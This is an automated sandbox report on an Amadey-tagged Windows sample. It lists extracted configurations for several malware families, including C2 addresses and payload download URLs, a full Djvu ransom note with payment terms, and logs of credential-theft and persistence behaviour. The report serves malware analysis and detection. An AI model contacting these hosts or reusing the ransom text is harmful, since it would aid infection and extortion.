amadey | bca75ab0bb5422913cebbbf496921a29c2686604e2ca29b8335887ce98266038

Resubmissions

19-12-2022 19:27

221219-x6fhhaah9z 10

19-12-2022 15:53

221219-tbl51sae2y 10

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
19-12-2022 15:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

312KB
MD5

048c5750cce12e02e62aa2f2b961629d
SHA1

f3ada2cb30bb9425ceab9ebc7e862f632c2e1629
SHA256

bca75ab0bb5422913cebbbf496921a29c2686604e2ca29b8335887ce98266038
SHA512

bc54df0bac11752baf68c6b1587ac23debf84ef0067c9f5270fc33eb4793c84a13d436c6759c52903f2fe4aa857849f00f1820751554ec9f518cd3e1b2005664
SSDEEP

3072:llckLrdy2gjCJ8rPMsilLtob+1k4/ZK7rMFxMSgkH4rOPHFRuUrIb6u8qn1n6dpu:rckLs/VgFS2pMXkH4rWlRjO1n

Malware Config

Extracted

Family

amadey

Version

3.63

62.204.41.79/tT7774433/index.php

Extracted

Family

redline

Botnet

mario23_10

167.235.252.160:10642

Attributes

auth_value
eca57cfb5172f71dc45986763bb98942

Extracted

Family

amadey

Version

3.60

62.204.41.13/gjend7w/index.php

Extracted

Family

djvu

http://abibiall.com/lancer/get.php

Attributes

extension
.bttu
offline_id
8p2Go5ZmkbFk0DF2oJ6E8vGEogpBqqaGCWjto1t1
payload_url
http://uaery.top/dl/build2.exe

http://abibiall.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-Q5EougBEbU Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0619JOsie

rsa_pubkey.plain

Extracted

Family

redline

Botnet

installs1

89.23.96.2:7253

Attributes

auth_value
fb538922d8f77f00fb6c39f8066af176

Extracted

Family

socelars

https://hdbywe.s3.us-west-2.amazonaws.com/wduwe19/

Extracted

Family

redline

Botnet

@$I*ASHYLR568123sUSA=PCs

45.14.165.227:26316

Attributes

auth_value
5d3f05d27e1d50887e97b4748b4f27d1

Extracted

Family

aurora

45.144.30.146:8081

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Amadey credential stealer module 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\bf045808586a24\cred64.dll	amadey_cred_module
behavioral2/memory/5052-315-0x00000000004D0000-0x00000000004F4000-memory.dmp	amadey_cred_module
C:\Users\Admin\AppData\Roaming\bf045808586a24\cred64.dll	amadey_cred_module
C:\Users\Admin\AppData\Roaming\bf045808586a24\cred64.dll	amadey_cred_module

Detect rhadamanthys stealer shellcode 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5296-365-0x0000000000B00000-0x0000000000B1D000-memory.dmp	family_rhadamanthys

Detected Djvu ransomware 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1308-183-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1308-185-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1884-187-0x00000000021E0000-0x00000000022FB000-memory.dmp	family_djvu
behavioral2/memory/1308-188-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1308-200-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1308-205-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3244-211-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3244-213-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3244-217-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3244-244-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4800-133-0x00000000005E0000-0x00000000005E9000-memory.dmp	family_smokeloader
behavioral2/memory/996-161-0x0000000000560000-0x0000000000569000-memory.dmp	family_smokeloader

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4472-166-0x0000000000400000-0x0000000000460000-memory.dmp	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000010001\mp3studios_97.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\1000010001\mp3studios_97.exe	family_socelars

Blocklisted process makes network request 4 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

flow pid process

156 1512 rundll32.exe
175 5052 rundll32.exe
211 3408 rundll32.exe
246 5608 rundll32.exe
Downloads MZ/PE file

flow	pid	process
156	1512	rundll32.exe
175	5052	rundll32.exe
211	3408	rundll32.exe
246	5608	rundll32.exe

Executes dropped EXE 32 IoCs

Processes:

D1CC.exeD392.exeD633.exeD7F9.exeD980.exenbveek.exenbveek.exeDB08.exeLega.exegntuud.exeDB08.exeladia.exeDB08.exeDB08.exebuild2.exebuild2.exebuild3.exemstsca.exegntuud.exenbveek.exe55A8.exetfujeoq728.exemp3studios_97.exeSabotaging.exeSabotaging.exepb1109.exelinda5.exeladia.exe19DEC.exeOtersideMETA.exegntuud.exenbveek.exe

pid	process
996	D1CC.exe
4476	D392.exe
3180	D633.exe
3492	D7F9.exe
4628	D980.exe
3996	nbveek.exe
3932	nbveek.exe
1884	DB08.exe
4064	Lega.exe
2272	gntuud.exe
1308	DB08.exe
2592	ladia.exe
1676	DB08.exe
3244	DB08.exe
4268	build2.exe
4820	build2.exe
3868	build3.exe
4596	mstsca.exe
2688	gntuud.exe
2608	nbveek.exe
4760	55A8.exe
3012	tfujeoq728.exe
4348	mp3studios_97.exe
5028	Sabotaging.exe
2064	Sabotaging.exe
5048	pb1109.exe
4064	linda5.exe
5160	ladia.exe
5240	19DEC.exe
5564	OtersideMETA.exe
6024	gntuud.exe
6040	nbveek.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/5668-378-0x0000000000400000-0x000000000073C000-memory.dmp	upx

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/5048-326-0x0000000140000000-0x0000000140617000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

nbveek.exelinda5.exebuild2.exeD633.exeD7F9.exeLega.exegntuud.exeDB08.exeDB08.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	nbveek.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	linda5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	build2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	D633.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	D7F9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Lega.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	gntuud.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	DB08.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	DB08.exe

Loads dropped DLL 8 IoCs

Processes:

build2.exerundll32.exerundll32.exerundll32.exeregsvr32.exerundll32.exe

pid process

4820 build2.exe
4820 build2.exe
1512 rundll32.exe
5052 rundll32.exe
5052 rundll32.exe
3408 rundll32.exe
4236 regsvr32.exe
5608 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

5060 icacls.exe
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4820	build2.exe
4820	build2.exe
1512	rundll32.exe
5052	rundll32.exe
5052	rundll32.exe
3408	rundll32.exe
4236	regsvr32.exe
5608	rundll32.exe

pid	process
5060	icacls.exe

Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs

collection

Email Collection

T1114

Processes:

rundll32.exerundll32.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

DB08.exenbveek.exegntuud.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\111497ca-7352-45b5-b0a1-49db5695ca2c\\DB08.exe\" --AutoStart"	DB08.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ladia.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000012051\\ladia.exe"	nbveek.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ladia.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000015051\\ladia.exe"	gntuud.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

66 api.2ip.ua
70 api.2ip.ua
88 api.2ip.ua

flow	ioc
66	api.2ip.ua
70	api.2ip.ua
88	api.2ip.ua

Suspicious use of SetThreadContext 9 IoCs

Processes:

D980.exeDB08.exeDB08.exebuild2.exetfujeoq728.exeSabotaging.exerundll32.exe19DEC.exeOtersideMETA.exe

description	pid	process	target process
PID 4628 set thread context of 4472	4628	D980.exe	AppLaunch.exe
PID 1884 set thread context of 1308	1884	DB08.exe	DB08.exe
PID 1676 set thread context of 3244	1676	DB08.exe	DB08.exe
PID 4268 set thread context of 4820	4268	build2.exe	build2.exe
PID 3012 set thread context of 1952	3012	tfujeoq728.exe	vbc.exe
PID 5028 set thread context of 2064	5028	Sabotaging.exe	Sabotaging.exe
PID 1512 set thread context of 2144	1512	rundll32.exe	rundll32.exe
PID 5240 set thread context of 5296	5240	19DEC.exe	AppLaunch.exe
PID 5564 set thread context of 5668	5564	OtersideMETA.exe	CasPol.exe

Drops file in Program Files directory 10 IoCs

Processes:

mp3studios_97.exe

description	ioc	process
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js	mp3studios_97.exe
File opened for modification	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	mp3studios_97.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\icon.png	mp3studios_97.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js	mp3studios_97.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	mp3studios_97.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js	mp3studios_97.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\background.html	mp3studios_97.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js	mp3studios_97.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js	mp3studios_97.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\manifest.json	mp3studios_97.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 9 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4652	4476	WerFault.exe	D392.exe
1520	4628	WerFault.exe	D980.exe
2300	2592	WerFault.exe	ladia.exe
3560	4760	WerFault.exe	55A8.exe
4268	3012	WerFault.exe	tfujeoq728.exe
2144	2064	WerFault.exe	Sabotaging.exe
5356	5240	WerFault.exe	19DEC.exe
5512	5160	WerFault.exe	ladia.exe
6080	5608	WerFault.exe	rundll32.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

file.exeD1CC.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D1CC.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D1CC.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D1CC.exe

Checks processor information in registry 2 TTPs 23 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build2.exerundll32.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	rundll32.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4388 schtasks.exe
4004 schtasks.exe
3884 schtasks.exe
4848 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5076 timeout.exe

pid	process
4388	schtasks.exe
4004	schtasks.exe
3884	schtasks.exe
4848	schtasks.exe

pid	process
5076	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3860 taskkill.exe

pid	process
3860	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Modifies registry class 30 IoCs

Processes:

rundll32.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000009355cf86100054656d7000003a0009000400efbe0c5519999355cf862e00000000000000000000000000000000000000000000000000d25ec000540065006d007000000014000000
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1"
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	rundll32.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

pid process

2212

pid	process
2212

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exe

pid	process
4800	file.exe
4800	file.exe
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2212
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

file.exeD1CC.exe

pid process

4800 file.exe
996 D1CC.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

chrome.exe

pid process

4680 chrome.exe
4680 chrome.exe
4680 chrome.exe
4680 chrome.exe
4680 chrome.exe

pid	process
2212

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

ladia.exeAppLaunch.exevbc.exemp3studios_97.exe

description	pid	process
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
